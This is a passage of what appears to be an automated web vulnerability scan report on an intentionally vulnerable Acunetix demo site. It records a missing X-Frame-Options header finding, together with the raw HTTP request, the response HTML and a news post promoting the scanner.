data.</p> <p><strong>500,000 customer credit card numbers obtained via a web attack</strong><br /> Well-known sites that were open to web application attacks include fashion label Guess and pet supply retailer PetCo.com who were notoriously found to be vulnerable to the SQL injection vulnerability (June 2003). This resulted in PetCo leaving as many as 500,000 credit card numbers open to anyone able to construct this specially-crafted URL.</p> <p><strong>Firewalls, SSL and locked-down servers are futile against web application hacking</strong><br /> Any defense at network security level will provide no protection against web application attacks since they are launched on port 80 - which has to remain open. In addition, web applications (customer areas, shopping carts etc.) are often tailor-made, invariably tested less than off-the-shelf software and are therefore more susceptible to attack.</p> <p>"Companies have implemented network-level security, however they fail to audit and secure their web applications. These applications have access to sensitive data and are a hacker's prime target," said Nick Galea, CEO of Acunetix. "Auditing one's web apps should be the number one security concern."</p> <p><strong>The need for an automated web application vulnerability scanner</strong><br /> Manually auditing a web application for vulnerabilities to SQL injection, cross site scripting and other web attacks is virtually impossible. With Acunetix Web Vulnerability Scanner the process of auditing web applications such as shopping carts and forms, can be easily automated. What's more, the security checks can easily be re-launched for each application update.</p> <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br /> Acunetix WVS first crawls the whole website, analyzes in-depth each file it finds, and displays the entire website structure. After this discovery stage, it performs an automatic audit for common security vulnerabilities.</p> <p><strong>Automatically detects SQL injection, cross site scripting and other web vulnerabilities</strong><br /> SQL injection is a hacking technique which modifies SQL commands in order to gain access to data in the database. Cross site scripting attacks allow a hacker to execute a malicious script on your visitors' browser. Acunetix Web Vulnerability Scanner can check if your web application is vulnerable to both of these attacks. More information about cross site scripting & SQL injection at our website security info page.</p> <p><strong>Acunetix Web Vulnerability Scanner also checks for the following web attacks:</strong></p> <ul> <li>CRLF injection attacks<br /> </li><li>Code execution attacks<br /> </li><li>Directory traversal attacks<br /> </li><li>File inclusion attacks<br /> </li><li> Input validation attacks<br /> </li><li>Authentication attacks.</li> </ul> <p><strong>Advanced penetration testing tools</strong><br /> Acunetix WVS also includes tools such as an HTTP editor & HTTP sniffer to allow customization of web vulnerability checks. Using the Vulnerability editor, new attacks can easily be created.</p> <p><strong>Pricing & availability</strong><br /> Acunetix WVS is available as an enterprise or as a consultant version. A subscription based license can be purchased for as little as $395, whereas a perpetual license starts at $2995. For more information visit our pricing page.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>Parameter X-Frame-OptionsSolution Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY. Alternatively consider implementing Content Security Policy's "frame-ancestors" directive.
POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=3
Alert tags Alert description X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.
Request Request line and header section (413 bytes)
POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=3 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?id=3 Content-Length: 3745 Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232Request body (3745 bytes)
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8%2BaGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BQWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A%2BICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgIeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTNkZAILDxYCHgNzcmNkZGTLo6VVRRdQACEbfKXC37R1sHPpoA%3D%3D&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwK30rH2AgK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ9jwc%2FcRnTJwdNTwN8SPSTaigKqpw%3D%3DResponse Status line and header section (222 bytes)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Mon, 25 Jul 2022 13:05:21 GMT Content-Length: 17859Response body (17859 bytes)
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=3" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8+aGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+QWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A+ICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgQeBFRleHQFElJlYWQgdXNlciBjb21tZW50cx4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg/aWQ9M2RkAgsPFgIeA3NyY2RkZNGFyTb9L/R3K+NgG4eTH6G64d5v" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit || (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKblqunCgK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8M7PLE5RqS1nNbgt2x8WWJp0h2GA==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:37:35 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV> <DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently, therefore it is not recommended that the same beta version is used for more than 30 days. To beta-test beyond 30 days, users should install the latest beta version or, if available, use the release version.</p> <p><strong>About Acunetix Web Vulnerability Scanner</strong><br /> Acunetix Web Vulnerability Scanner, a unique web application scanning product that makes securing one’s website easier than ever. Acunetix Web Vulnerability Scanner is an automated web application security testing tool that crawls an entire website and attacks it so as to identify potential weaknesses before hackers do. Further information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px 